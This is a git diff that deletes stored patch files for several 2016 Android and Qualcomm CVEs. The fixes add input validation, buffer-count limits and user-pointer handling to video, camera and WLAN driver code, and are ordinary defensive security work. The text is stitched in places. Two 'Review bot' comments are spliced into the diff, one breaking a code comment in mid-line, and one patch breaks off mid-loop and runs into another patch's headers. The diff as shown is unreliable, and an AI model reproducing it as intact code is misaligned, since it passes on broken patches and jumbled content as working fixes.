- (OMX_INDEXTYPE)OMX_QcomIndexParamH264AUDelimiter)) { - DEBUG_PRINT_ERROR("%s: %s", -@@ -1354,6 +1380,7 @@ - } - case OMX_QcomIndexHierarchicalStructure: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_VIDEO_HIERARCHICALLAYERS); - QOMX_VIDEO_HIERARCHICALLAYERS* pParam = - (QOMX_VIDEO_HIERARCHICALLAYERS*)paramData; - DEBUG_PRINT_LOW("OMX_QcomIndexHierarchicalStructure"); -@@ -1377,6 +1404,7 @@ - } - case OMX_QcomIndexParamPerfLevel: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_PERF_LEVEL); - if (!handle->venc_set_param(paramData, - (OMX_INDEXTYPE) OMX_QcomIndexParamPerfLevel)) { - DEBUG_PRINT_ERROR("ERROR: Setting performance level"); -@@ -1386,6 +1414,7 @@ - } - case OMX_QcomIndexParamH264VUITimingInfo: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_VUI_TIMING_INFO); - if (!handle->venc_set_param(paramData, - (OMX_INDEXTYPE) OMX_QcomIndexParamH264VUITimingInfo)) { - DEBUG_PRINT_ERROR("ERROR: Setting VUI timing info"); -@@ -1395,6 +1424,7 @@ - } - case OMX_QcomIndexParamPeakBitrate: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_PEAK_BITRATE); - if (!handle->venc_set_param(paramData, - (OMX_INDEXTYPE) OMX_QcomIndexParamPeakBitrate)) { - DEBUG_PRINT_ERROR("ERROR: Setting peak bitrate"); -@@ -1404,6 +1434,7 @@ - } - case QOMX_IndexParamVideoInitialQp: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_VIDEO_INITIALQP); - if(!handle->venc_set_param(paramData, - (OMX_INDEXTYPE)QOMX_IndexParamVideoInitialQp)) { - DEBUG_PRINT_ERROR("Request to Enable initial QP failed"); -@@ -1423,6 +1454,7 @@ - } - case OMX_QcomIndexParamVideoHybridHierpMode: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_VIDEO_HYBRID_HP_MODE); - if(!handle->venc_set_param(paramData, - (OMX_INDEXTYPE)OMX_QcomIndexParamVideoHybridHierpMode)) { - DEBUG_PRINT_ERROR("Request to Enable Hybrid Hier-P failed"); -@@ -1527,6 +1559,7 @@ - switch ((int)configIndex) { - case OMX_IndexConfigVideoBitrate: - { -+ VALIDATE_OMX_PARAM_DATA(configData, 
OMX_VIDEO_CONFIG_BITRATETYPE); - OMX_VIDEO_CONFIG_BITRATETYPE* pParam = - reinterpret_cast(configData); - DEBUG_PRINT_HIGH("set_config(): OMX_IndexConfigVideoBitrate (%u)", (unsigned int)pParam->nEncodeBitrate); -@@ -1548,6 +1581,7 @@ - } - case OMX_IndexConfigVideoFramerate: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_CONFIG_FRAMERATETYPE); - OMX_CONFIG_FRAMERATETYPE* pParam = - reinterpret_cast(configData); - DEBUG_PRINT_HIGH("set_config(): OMX_IndexConfigVideoFramerate (0x%x)", (unsigned int)pParam->xEncodeFramerate); -@@ -1570,6 +1604,7 @@ - } - case QOMX_IndexConfigVideoIntraperiod: - { -+ VALIDATE_OMX_PARAM_DATA(configData, QOMX_VIDEO_INTRAPERIODTYPE); - QOMX_VIDEO_INTRAPERIODTYPE* pParam = - reinterpret_cast(configData); - -@@ -1627,6 +1662,7 @@ - - case OMX_IndexConfigVideoIntraVOPRefresh: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_CONFIG_INTRAREFRESHVOPTYPE); - OMX_CONFIG_INTRAREFRESHVOPTYPE* pParam = - reinterpret_cast(configData); - -@@ -1648,6 +1684,7 @@ - } - case OMX_IndexConfigCommonRotate: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_CONFIG_ROTATIONTYPE); - OMX_CONFIG_ROTATIONTYPE *pParam = - reinterpret_cast(configData); - OMX_S32 nRotation; -@@ -1695,6 +1732,7 @@ - { - DEBUG_PRINT_HIGH("set_config(): OMX_QcomIndexConfigVideoFramePackingArrangement"); - if (m_sOutPortFormat.eCompressionFormat == OMX_VIDEO_CodingAVC) { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_QCOM_FRAME_PACK_ARRANGEMENT); - OMX_QCOM_FRAME_PACK_ARRANGEMENT *configFmt = - (OMX_QCOM_FRAME_PACK_ARRANGEMENT *) configData; - extra_data_handle.set_frame_pack_data(configFmt); -@@ -1705,6 +1743,7 @@ - } - case QOMX_IndexConfigVideoLTRPeriod: - { -+ VALIDATE_OMX_PARAM_DATA(configData, QOMX_VIDEO_CONFIG_LTRPERIOD_TYPE); - QOMX_VIDEO_CONFIG_LTRPERIOD_TYPE* pParam = (QOMX_VIDEO_CONFIG_LTRPERIOD_TYPE*)configData; - if (!handle->venc_set_config(configData, (OMX_INDEXTYPE)QOMX_IndexConfigVideoLTRPeriod)) { - DEBUG_PRINT_ERROR("ERROR: Setting LTR period failed"); -@@ -1716,6 +1755,7 @@ - 
- case OMX_IndexConfigVideoVp8ReferenceFrame: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_VP8REFERENCEFRAMETYPE); - OMX_VIDEO_VP8REFERENCEFRAMETYPE* pParam = (OMX_VIDEO_VP8REFERENCEFRAMETYPE*) configData; - if (!handle->venc_set_config(pParam, (OMX_INDEXTYPE) OMX_IndexConfigVideoVp8ReferenceFrame)) { - DEBUG_PRINT_ERROR("ERROR: Setting VP8 reference frame"); -@@ -1727,6 +1767,7 @@ - - case QOMX_IndexConfigVideoLTRUse: - { -+ VALIDATE_OMX_PARAM_DATA(configData, QOMX_VIDEO_CONFIG_LTRUSE_TYPE); - QOMX_VIDEO_CONFIG_LTRUSE_TYPE* pParam = (QOMX_VIDEO_CONFIG_LTRUSE_TYPE*)configData; - if (!handle->venc_set_config(pParam, (OMX_INDEXTYPE)QOMX_IndexConfigVideoLTRUse)) { - DEBUG_PRINT_ERROR("ERROR: Setting LTR use failed"); -@@ -1737,6 +1778,7 @@ - } - case QOMX_IndexConfigVideoLTRMark: - { -+ VALIDATE_OMX_PARAM_DATA(configData, QOMX_VIDEO_CONFIG_LTRMARK_TYPE); - QOMX_VIDEO_CONFIG_LTRMARK_TYPE* pParam = (QOMX_VIDEO_CONFIG_LTRMARK_TYPE*)configData; - if (!handle->venc_set_config(pParam, (OMX_INDEXTYPE)QOMX_IndexConfigVideoLTRMark)) { - DEBUG_PRINT_ERROR("ERROR: Setting LTR mark failed"); -@@ -1746,6 +1788,7 @@ - } - case OMX_IndexConfigVideoAVCIntraPeriod: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_AVCINTRAPERIOD); - OMX_VIDEO_CONFIG_AVCINTRAPERIOD *pParam = (OMX_VIDEO_CONFIG_AVCINTRAPERIOD*) configData; - DEBUG_PRINT_LOW("set_config: OMX_IndexConfigVideoAVCIntraPeriod"); - if (!handle->venc_set_config(pParam, (OMX_INDEXTYPE)OMX_IndexConfigVideoAVCIntraPeriod)) { -@@ -1757,6 +1800,7 @@ - } - case OMX_IndexConfigCommonDeinterlace: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_DEINTERLACE); - OMX_VIDEO_CONFIG_DEINTERLACE *pParam = (OMX_VIDEO_CONFIG_DEINTERLACE*) configData; - DEBUG_PRINT_LOW("set_config: OMX_IndexConfigCommonDeinterlace"); - if (!handle->venc_set_config(pParam, (OMX_INDEXTYPE)OMX_IndexConfigCommonDeinterlace)) { -@@ -1768,6 +1812,7 @@ - } - case OMX_QcomIndexConfigVideoVencPerfMode: - { -+ 
VALIDATE_OMX_PARAM_DATA(configData, QOMX_EXTNINDEX_VIDEO_PERFMODE); - QOMX_EXTNINDEX_VIDEO_PERFMODE* pParam = (QOMX_EXTNINDEX_VIDEO_PERFMODE*)configData; - if (!handle->venc_set_config(pParam, (OMX_INDEXTYPE)OMX_QcomIndexConfigVideoVencPerfMode)) { - DEBUG_PRINT_ERROR("ERROR: Setting OMX_QcomIndexConfigVideoVencPerfMode failed"); -@@ -1777,6 +1822,7 @@ - } - case OMX_IndexConfigPriority: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_PARAM_U32TYPE); - if (!handle->venc_set_config(configData, (OMX_INDEXTYPE)OMX_IndexConfigPriority)) { - DEBUG_PRINT_ERROR("Failed to set OMX_IndexConfigPriority"); - return OMX_ErrorUnsupportedSetting; -@@ -1785,6 +1831,7 @@ - } - case OMX_IndexConfigOperatingRate: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_PARAM_U32TYPE); - if (!handle->venc_set_config(configData, (OMX_INDEXTYPE)OMX_IndexConfigOperatingRate)) { - DEBUG_PRINT_ERROR("Failed to set OMX_IndexConfigOperatingRate"); - return handle->hw_overload ? OMX_ErrorInsufficientResources : diff --git a/Patches/Linux_CVEs/CVE-2016-2480/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2480/ANY/0001.patch.base64 deleted file mode 100644 index f954ff7c..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2480/ANY/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ 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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2016-2482/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2482/ANY/0001.patch deleted file mode 100644 index 1f87b1be..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2482/ANY/0001.patch +++ /dev/null 
@@ -1,131 +0,0 @@ -diff --git a/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h b/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h -index 120a11d..3d8ec9e 100644 ---- a/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h -+++ b/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h -@@ -183,7 +183,7 @@ - #define DESC_BUFFER_SIZE (8192 * 16) - - #ifdef _ANDROID_ --#define MAX_NUM_INPUT_OUTPUT_BUFFERS 32 -+#define MAX_NUM_INPUT_OUTPUT_BUFFERS 64 - #endif - - #ifdef _ION_HEAP_MASK_COMPATIBILITY_WA -diff --git a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp -index 977aef2..95ffb98 100644 ---- a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp -+++ b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp -@@ -3401,10 +3401,22 @@ - break; - } - -- if (!client_buffers.get_buffer_req(buffer_size)) { -+ if (portDefn->nBufferCountActual > MAX_NUM_INPUT_OUTPUT_BUFFERS) { -+ DEBUG_PRINT_ERROR("Requested o/p buf count (%u) exceeds limit (%u)", -+ portDefn->nBufferCountActual, MAX_NUM_INPUT_OUTPUT_BUFFERS); -+ eRet = OMX_ErrorBadParameter; -+ } else if (!client_buffers.get_buffer_req(buffer_size)) { - DEBUG_PRINT_ERROR("Error in getting buffer requirements"); - eRet = OMX_ErrorBadParameter; - } else if (!port_format_changed) { -+ -+ // Buffer count can change only when port is disabled -+ if (!release_output_done()) { -+ DEBUG_PRINT_ERROR("Cannot change o/p buffer count since all buffers are not freed yet !"); -+ eRet = OMX_ErrorInvalidState; -+ break; -+ } -+ - if ( portDefn->nBufferCountActual >= drv_ctx.op_buf.mincount && - portDefn->nBufferSize >= drv_ctx.op_buf.buffer_size ) { - drv_ctx.op_buf.actualcount = portDefn->nBufferCountActual; -@@ -3513,6 +3525,19 @@ - eRet = OMX_ErrorBadParameter; - break; - } -+ if (portDefn->nBufferCountActual > MAX_NUM_INPUT_OUTPUT_BUFFERS) { -+ DEBUG_PRINT_ERROR("Requested i/p buf count (%u) exceeds limit (%u)", -+ portDefn->nBufferCountActual, MAX_NUM_INPUT_OUTPUT_BUFFERS); -+ eRet = OMX_ErrorBadParameter; -+ break; -+ } -+ // Buffer count 
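Review bot: The raised limit in the embedded omx_vdec.h hunk (`#define MAX_NUM_INPUT_OUTPUT_BUFFERS 64`) is not tied to the width of the bitmasks that the later free_buffer hunks of omx_vdec_msm8974.cpp test with `BITMASK_PRESENT(&m_inp_bm_count, nPortIndex)` and `BITMASK_PRESENT(&m_out_bm_count, nPortIndex)`. The declarations of those masks are outside the visible hunks, so this is a point to confirm rather than a found defect. If either mask holds fewer than 64 bits, indexes 32 to 63 would be accepted by the new `nBufferCountActual > MAX_NUM_INPUT_OUTPUT_BUFFERS` check but would address bits outside the mask. A comment on the define such as `/* must not exceed the bit capacity of m_inp_bm_count and m_out_bm_count */` would record the constraint, and a compile-time assertion beside the mask declarations would enforce it.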
can change only when port is disabled -+ if (!release_input_done()) { -+ DEBUG_PRINT_ERROR("Cannot change i/p buffer count since all buffers are not freed yet !"); -+ eRet = OMX_ErrorInvalidState; -+ break; -+ } -+ - if (portDefn->nBufferCountActual >= drv_ctx.ip_buf.mincount - || portDefn->nBufferSize != drv_ctx.ip_buf.buffer_size) { - port_format_changed = true; -@@ -5882,7 +5907,8 @@ - nPortIndex = buffer - m_inp_heap_ptr; - - DEBUG_PRINT_LOW("free_buffer on i/p port - Port idx %d", nPortIndex); -- if (nPortIndex < drv_ctx.ip_buf.actualcount) { -+ if (nPortIndex < drv_ctx.ip_buf.actualcount && -+ BITMASK_PRESENT(&m_inp_bm_count, nPortIndex)) { - // Clear the bit associated with it. - BITMASK_CLEAR(&m_inp_bm_count,nPortIndex); - BITMASK_CLEAR(&m_heap_inp_bm_count,nPortIndex); -@@ -5924,7 +5950,8 @@ - } else if (port == OMX_CORE_OUTPUT_PORT_INDEX) { - // check if the buffer is valid - nPortIndex = buffer - client_buffers.get_il_buf_hdr(); -- if (nPortIndex < drv_ctx.op_buf.actualcount) { -+ if (nPortIndex < drv_ctx.op_buf.actualcount && -+ BITMASK_PRESENT(&m_out_bm_count, nPortIndex)) { - DEBUG_PRINT_LOW("free_buffer on o/p port - Port idx %d", nPortIndex); - // Clear the bit associated with it. 
- BITMASK_CLEAR(&m_out_bm_count,nPortIndex); -@@ -6576,7 +6603,14 @@ - if (m_out_mem_ptr) { - DEBUG_PRINT_LOW("Freeing the Output Memory"); - for (i = 0; i < drv_ctx.op_buf.actualcount; i++ ) { -- free_output_buffer (&m_out_mem_ptr[i]); -+ if (BITMASK_PRESENT(&m_out_bm_count, i)) { -+ BITMASK_CLEAR(&m_out_bm_count, i); -+ client_buffers.free_output_buffer (&m_out_mem_ptr[i]); -+ } -+ -+ if (release_output_done()) { -+ break; -+ } - } - #ifdef _ANDROID_ICS_ - memset(&native_buffer, 0, (sizeof(nativebuffer) * MAX_NUM_INPUT_OUTPUT_BUFFERS)); -@@ -6587,11 +6621,19 @@ - if (m_inp_mem_ptr || m_inp_heap_ptr) { - DEBUG_PRINT_LOW("Freeing the Input Memory"); - for (i = 0; i -Date: Wed, 8 Jun 2016 16:32:11 +0530 -Subject: msm: camera: ispif: Validate VFE num input during reset - -Userspace supplies the actual number of used VFEs in session to ISPIF. -Validate the userspace input value and if found to be invalid, return -error. - -CRs-Fixed: 898074 -Signed-off-by: Venu Yeshala -Signed-off-by: VijayaKumar T M -Change-Id: I3288ddb6404e817a705a92281b4c54666f372c56 ---- - drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 8 ++++++-- - 1 file changed, 6 insertions(+), 2 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c -index 7fb1ac1..94735fd 100644 ---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c -+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c -@@ -1133,9 +1133,13 @@ static irqreturn_t msm_io_ispif_irq(int irq_num, void *data) - static int msm_ispif_set_vfe_info(struct ispif_device *ispif, - struct msm_ispif_vfe_info *vfe_info) - { -- memcpy(&ispif->vfe_info, vfe_info, sizeof(struct msm_ispif_vfe_info)); -- if (ispif->vfe_info.num_vfe > ispif->hw_num_isps) -+ if (!vfe_info || (vfe_info->num_vfe <= 0) || -+ ((uint32_t)(vfe_info->num_vfe) > ispif->hw_num_isps)) { -+ pr_err("Invalid VFE info: %p %d\n", vfe_info, -+ (vfe_info ? 
vfe_info->num_vfe:0)); - return -EINVAL; -+ } -+ memcpy(&ispif->vfe_info, vfe_info, sizeof(struct msm_ispif_vfe_info)); - return 0; - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-2498/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2498/ANY/0001.patch deleted file mode 100644 index 2b3c646e..00000000 --- a/Patches/Linux_CVEs/CVE-2016-2498/ANY/0001.patch +++ /dev/null 
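Review bot: The new `pr_err` in msm_ispif_set_vfe_info prints the `vfe_info` pointer with `%p` and fires on every rejected request, while the commit message says the rejected value is supplied by userspace. A caller that can reach this path can therefore fill the kernel log at will. If `vfe_info` points into kernel memory, as the memcpy into `ispif->vfe_info` suggests, kernels that print `%p` unhashed also write that address to the log. Logging only the offending count and rate-limiting the message covers both: `pr_err_ratelimited("Invalid VFE info: num_vfe %d\n", vfe_info ? vfe_info->num_vfe : 0);`.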
@@ -1,303 +0,0 @@
-From 1d23dacdbd6b3a2b59b952f2fa3a578f9d15f60f Mon Sep 17 00:00:00 2001
-From: Arif Hussain
-Date: Mon, 11 Nov 2013 22:59:34 -0800
-Subject: wlan: wlan_hdd_wext Userspace data copy fix
-
-Use copy_to_user and copy_from_user for
-copying data to/from user space.
-
-Change-Id: I98fb6352b654af8f78160738e7ccd902c3c70031
-CRs-Fixed: 561028
----
- CORE/HDD/src/wlan_hdd_wext.c | 75 +++++++++++++++++++++++++--------------------
- 1 file changed, 42 insertions(+), 33 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 83107e1..1e9ba2e 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -1529,7 +1529,7 @@ static int iw_set_genie(struct net_device *dev,
- {
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
- hdd_wext_state_t *pWextState = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
-- u_int8_t *genie;
-+ u_int8_t *genie = (u_int8_t *)extra;
- v_U16_t remLen;
-
- ENTER();
-@@ -1544,7 +1544,6 @@ static int iw_set_genie(struct net_device *dev,
- return 0;
- }
-
-- genie = wrqu->data.pointer;
- remLen = wrqu->data.length;
-
- hddLog(LOG1,"iw_set_genie ioctl IE[0x%X], LEN[%d]\n", genie[0], genie[1]);
-@@ -1672,9 +1671,14 @@ static int iw_get_genie(struct net_device *dev,
- pAdapter->sessionId,
- &length,
- genIeBytes);
-- wrqu->data.length = VOS_MIN((u_int16_t) length, DOT11F_IE_RSN_MAX_LEN);
--
-- vos_mem_copy( wrqu->data.pointer, (v_VOID_t*)genIeBytes, wrqu->data.length);
-+ length = VOS_MIN((u_int16_t) length, DOT11F_IE_RSN_MAX_LEN);
-+ if (wrqu->data.length < length)
-+ {
-+ hddLog(LOG1, "%s: failed to copy data to user buffer", __func__);
-+ return -EFAULT;
-+ }
-+ vos_mem_copy( extra, (v_VOID_t*)genIeBytes, wrqu->data.length);
-+ wrqu->data.length = length;
-
- hddLog(LOG1,"%s: RSN IE of %d bytes returned\n", __func__, wrqu->data.length );
-
-@@ -2364,7 +2368,7 @@ static int iw_get_rssi(struct net_device *dev,
- union iwreq_data *wrqu, char *extra)
- {
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-- char *cmd = (char*)wrqu->data.pointer;
-+ char *cmd = extra;
- int len = wrqu->data.length;
- v_S7_t s7Rssi = 0;
- hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
-@@ -2621,7 +2625,7 @@ static int iw_set_priv(struct net_device *dev,
- union iwreq_data *wrqu, char *extra)
- {
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-- char *cmd = (char*)wrqu->data.pointer;
-+ char *cmd = extra;
- int cmd_len = wrqu->data.length;
- int ret = 0;
- int status = 0;
-@@ -2875,6 +2879,16 @@ done:
- /* there was an encoding error or overflow */
- status = -EIO;
- }
-+ else if (ret > 0)
-+ {
-+ if (copy_to_user(wrqu->data.pointer, cmd, ret))
-+ {
-+ hddLog(VOS_TRACE_LEVEL_ERROR,
-+ "%s: failed to copy data to user buffer", __func__);
-+ return -EFAULT;
-+ }
-+ wrqu->data.length = ret;
-+ }
-
- if (ioctl_debug)
- {
-@@ -2882,7 +2896,6 @@ done:
- __func__, cmd, wrqu->data.length, status);
- }
- return status;
--
- }
-
- static int iw_set_nick(struct net_device *dev,
-@@ -3827,7 +3840,7 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- #endif /* WLAN_FEATURE_VOWIFI */
-
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received length %d", __func__, wrqu->data.length);
-- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received data %s", __func__, extra);
-
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
- {
-@@ -3840,11 +3853,11 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- {
- case WE_WOWL_ADD_PTRN:
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "ADD_PTRN\n");
-- hdd_add_wowl_ptrn(pAdapter, (char*)wrqu->data.pointer);
-+ hdd_add_wowl_ptrn(pAdapter, extra);
- break;
- case WE_WOWL_DEL_PTRN:
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "DEL_PTRN\n");
-- hdd_del_wowl_ptrn(pAdapter, (char*)wrqu->data.pointer);
-+ hdd_del_wowl_ptrn(pAdapter, extra);
- break;
- #if defined WLAN_FEATURE_VOWIFI
- case WE_NEIGHBOR_REPORT_REQUEST:
-@@ -3859,7 +3872,7 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- if( !neighborReq.no_ssid )
- {
- neighborReq.ssid.length = (wrqu->data.length - 1) > 32 ? 32 : (wrqu->data.length - 1) ;
-- vos_mem_copy( neighborReq.ssid.ssId, wrqu->data.pointer, neighborReq.ssid.length );
-+ vos_mem_copy( neighborReq.ssid.ssId, extra, neighborReq.ssid.length );
- }
-
- callbackInfo.neighborRspCallback = NULL;
-@@ -3877,10 +3890,10 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- #endif
- case WE_SET_AP_WPS_IE:
- hddLog( LOGE, "Received WE_SET_AP_WPS_IE" );
-- sme_updateP2pIe( WLAN_HDD_GET_HAL_CTX(pAdapter), wrqu->data.pointer, wrqu->data.length );
-+ sme_updateP2pIe( WLAN_HDD_GET_HAL_CTX(pAdapter), extra, wrqu->data.length );
- break;
- case WE_SET_CONFIG:
-- vstatus = hdd_execute_config_command(pHddCtx, wrqu->data.pointer);
-+ vstatus = hdd_execute_config_command(pHddCtx, extra);
- if (VOS_STATUS_SUCCESS != vstatus)
- {
- ret = -EINVAL;
-@@ -4400,7 +4413,7 @@ int iw_set_var_ints_getnone(struct net_device *dev, struct iw_request_info *info
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
- tHalHandle hHal = WLAN_HDD_GET_HAL_CTX(pAdapter);
- int sub_cmd = wrqu->data.flags;
-- int *value = (int*)wrqu->data.pointer;
-+ int *value = (int*)extra;
- int apps_args[MAX_VAR_ARGS] = {0};
- int num_args = wrqu->data.length;
- hdd_station_ctx_t *pStaCtx = NULL ;
-@@ -4751,10 +4764,10 @@ static int iw_qcom_set_wapi_mode(struct net_device *dev, struct iw_request_info
- hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
- tCsrRoamProfile *pRoamProfile = &pWextState->roamProfile;
-
-- WAPI_FUNCTION_MODE *pWapiMode = (WAPI_FUNCTION_MODE *)wrqu->data.pointer;
-+ WAPI_FUNCTION_MODE *pWapiMode = (WAPI_FUNCTION_MODE *)extra;
-
- hddLog(LOG1, "The function iw_qcom_set_wapi_mode called");
-- hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-+ hddLog(LOG1, "%s: Received data %s", __func__, extra);
- hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
- hddLog(LOG1, "%s: Input Data (wreq) WAPI Mode:%02d", __func__, pWapiMode->wapiMode);
-
-@@ -4817,7 +4830,6 @@ static int iw_qcom_set_wapi_assoc_info(struct net_device *dev, struct iw_request
- int i = 0, j = 0;
- hddLog(LOG1, "The function iw_qcom_set_wapi_assoc_info called");
- hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
-- hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
- hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra);
-
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-@@ -4883,7 +4895,6 @@ static int iw_qcom_set_wapi_key(struct net_device *dev, struct iw_request_info *
-
- hddLog(LOG1, "The function iw_qcom_set_wapi_key called ");
- hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
-- hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
- hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra);
-
- hddLog(LOG1,":s: INPUT DATA:\nKey Type:0x%02x Key Direction:0x%02x KEY ID:0x%02x\n", __func__,pWapiKey->keyType,pWapiKey->keyDirection,pWapiKey->keyId);
-@@ -4984,12 +4995,11 @@ static int iw_qcom_set_wapi_bkid(struct net_device *dev, struct iw_request_info
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
- #ifdef WLAN_DEBUG
- int i = 0;
-- WLAN_BKID_LIST *pBkid = ( WLAN_BKID_LIST *) (wrqu->data.pointer);
-+ WLAN_BKID_LIST *pBkid = ( WLAN_BKID_LIST *) extra;
- #endif
-
- hddLog(LOG1, "The function iw_qcom_set_wapi_bkid called");
- hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
-- hddLog(LOG1, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
- hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra);
-
- hddLog(LOG1,"%s: INPUT DATA:\n BKID Length:0x%08lx\n", __func__,pBkid->length);
-@@ -5066,7 +5076,7 @@ static int iw_set_fties(struct net_device *dev, struct iw_request_info *info,
- #endif
-
- // Pass the received FT IEs to SME
-- sme_SetFTIEs( WLAN_HDD_GET_HAL_CTX(pAdapter), pAdapter->sessionId, wrqu->data.pointer,
-+ sme_SetFTIEs( WLAN_HDD_GET_HAL_CTX(pAdapter), pAdapter->sessionId, extra,
- wrqu->data.length);
-
- return 0;
-@@ -5078,7 +5088,7 @@ static int iw_set_dynamic_mcbc_filter(struct net_device *dev,
- union iwreq_data *wrqu, char *extra)
- {
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-- tpRcvFltMcAddrList pRequest = (tpRcvFltMcAddrList)wrqu->data.pointer;
-+ tpRcvFltMcAddrList pRequest = (tpRcvFltMcAddrList)extra;
- hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter);
- tpSirWlanSetRxpFilters wlanRxpFilterParam;
- tHalHandle hHal = WLAN_HDD_GET_HAL_CTX(pAdapter);
-@@ -5227,7 +5237,7 @@ static int iw_set_host_offload(struct net_device *dev, struct iw_request_info *i
- union iwreq_data *wrqu, char *extra)
- {
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-- tpHostOffloadRequest pRequest = (tpHostOffloadRequest)wrqu->data.pointer;
-+ tpHostOffloadRequest pRequest = (tpHostOffloadRequest) extra;
- tSirHostOffloadReq offloadRequest;
-
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-@@ -5236,7 +5246,6 @@ static int iw_set_host_offload(struct net_device *dev, struct iw_request_info *i
- "%s:LOGP in Progress. Ignore!!!", __func__);
- return -EBUSY;
- }
--
- /* Debug display of request components. */
- switch (pRequest->offloadType)
- {
-@@ -5299,7 +5308,7 @@ static int iw_set_keepalive_params(struct net_device *dev, struct iw_request_inf
- union iwreq_data *wrqu, char *extra)
- {
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-- tpKeepAliveRequest pRequest = (tpKeepAliveRequest)wrqu->data.pointer;
-+ tpKeepAliveRequest pRequest = (tpKeepAliveRequest) extra;
- tSirKeepAliveReq keepaliveRequest;
-
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-@@ -5500,7 +5509,7 @@ static int iw_set_packet_filter_params(struct net_device *dev, struct iw_request
- union iwreq_data *wrqu, char *extra)
- {
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-- tpPacketFilterCfg pRequest = (tpPacketFilterCfg)wrqu->data.pointer;
-+ tpPacketFilterCfg pRequest = (tpPacketFilterCfg) extra;
-
- return wlan_hdd_set_filter(WLAN_HDD_GET_CTX(pAdapter), pRequest, pAdapter->sessionId);
- }
